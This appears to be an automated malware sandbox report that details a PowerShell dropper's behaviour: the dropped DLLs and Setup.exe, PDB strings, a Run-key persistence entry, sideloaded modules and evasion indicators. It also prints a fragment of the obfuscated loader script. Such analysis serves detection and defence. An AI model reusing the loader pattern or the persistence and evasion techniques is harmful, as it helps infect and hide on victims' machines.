                    Source: Binary string: ntdll.pdbUGP source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdb source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdb source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbete All MessagesKAre you sure that you want to permanently delete all history for this user?!Delete: All history for this user=Are you sure that you want to permanently delete all history? source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: FatalErrorWarningDebugassert.report.fatalassert.report.errorassert.report.warningassert.report.debugassert.report.unknownasserts already initializedeax::foundation::initAssertionssAssertFailureFn == nullptr.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\Projects\WinRAR\rar\build\unrardll32\Release\UnRAR.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: .pdb.map.___> => > source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: ntdll.pdb source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Network.pdb source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdbc source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb?? source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: Setup.exe, 00000004.00000002.2048428381.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp, Setup.exe, 00000007.00000002.2085703925.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbqsutuuuvwz~ source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdbT source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($ljulRGEi) [System.IO.File]::WriteAllBytes($TLcoKujt, $HRYBsGNb) $ABlvAjxl = New-Item -ItemType Directory -Path $oLsXWGVm try { $czMOrxkv = Expand-Archive -Path $TLcoK
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: 0x775CB74C [Thu Jun 16 20:02:20 2033 UTC]
                    Source: Qt5Network.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x1579cb
                    Source: libssl-1_1-x64.dll.4.dr Static PE information: real checksum: 0x0 should be: 0xa8dea
                    Source: libcrypto-1_1-x64.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x2bdc1b
                    Source: LiteSkinUtils.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x1a34f
                    Source: Qt5Core.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x600b8c
                    Source: LiteRes.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xb9e4d
                    Source: ICQLiteShell.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xe60c
                    Source: mvrSettings32.dll.1.dr Static PE information: real checksum: 0x1157fe should be: 0x114a45
                    Source: Qt5Core.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x600b8c
                    Source: ICQRT.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x15007
                    Source: libcrypto-1_1-x64.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x2bdc1b
                    Source: Qt5Network.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x1579cb
                    Source: ktb.8.dr Static PE information: real checksum: 0x0 should be: 0x59f71
                    Source: accpl.12.dr Static PE information: real checksum: 0x0 should be: 0x59f71
                    Source: libssl-1_1-x64.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xa8dea
                    Source: vcl120.bpl.1.dr Static PE information: real checksum: 0x1fb2c0 should be: 0x1f8d56
                    Source: mvrSettings32.dll.1.dr Static PE information: section name: .didata
                    Source: libcrypto-1_1-x64.dll.1.dr Static PE information: section name: .00cfg
                    Source: libssl-1_1-x64.dll.1.dr Static PE information: section name: .00cfg
                    Source: opengl64.dll.1.dr Static PE information: section name: .uedbg
                    Source: opengl64.dll.1.dr Static PE information: section name: _RDATA
                    Source: Qt5Core.dll.1.dr Static PE information: section name: .qtmimed
                    Source: steam_api64.dll.1.dr Static PE information: section name: _RDATA
                    Source: vcruntime140.dll.1.dr Static PE information: section name: _RDATA
                    Source: CryptoPP530Fips64.dll.1.dr Static PE information: section name: TEXT
                    Source: libvlc.dll.1.dr Static PE information: section name: .buildid
                    Source: libvlc.dll.1.dr Static PE information: section name: /4
                    Source: libvlccore.dll.1.dr Static PE information: section name: .buildid
                    Source: libvlccore.dll.1.dr Static PE information: section name: /4
                    Source: ICQLiteShell.dll.1.dr Static PE information: section name: .orpc
                    Source: tradingnetworkingsockets.dll.1.dr Static PE information: section name: _RDATA
                    Source: madHcNet32.dll.1.dr Static PE information: section name: .didata
                    Source: libcrypto-1_1-x64.dll.4.dr Static PE information: section name: .00cfg
                    Source: libssl-1_1-x64.dll.4.dr Static PE information: section name: .00cfg
                    Source: Qt5Core.dll.4.dr Static PE information: section name: .qtmimed
                    Source: steam_api64.dll.4.dr Static PE information: section name: _RDATA
                    Source: vcruntime140.dll.4.dr Static PE information: section name: _RDATA
                    Source: ktb.8.dr Static PE information: section name: yicvgb
                    Source: accpl.12.dr Static PE information: section name: yicvgb
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 7_2_00007FFBA1D861D0 push rbp; retf 7_2_00007FFBA1D861D3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 7_2_00007FFBA1D861D8 push rbp; retf 7_2_00007FFBA1D861E3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 7_2_00007FFBA1D861A8 push rbp; retf 7_2_00007FFBA1D861AB
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 7_2_00007FFBA1D86118 push rbp; retf 7_2_00007FFBA1D8611B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe File created: C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl
                    Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\accpl
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocol
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prx
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bpl
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe File created: C:\Users\user\AppData\Roaming\DUC\msvcp140.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelper
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dll
                    Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\ktb
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe File created: C:\Users\user\AppData\Roaming\DUC\vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe File created: C:\Users\user\AppData\Roaming\DUC\libssl-1_1-x64.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\Qt5Core.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\Qt5Network.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\steam_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeFile created: C:\Users\user\AppData\Roaming\DUC\msvcp140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\ktbJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\accplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KTB
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ACCPL
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 76D83B54
                    Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: AABC87
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6182Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3523Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2062Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 482Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dllJump to dropped file
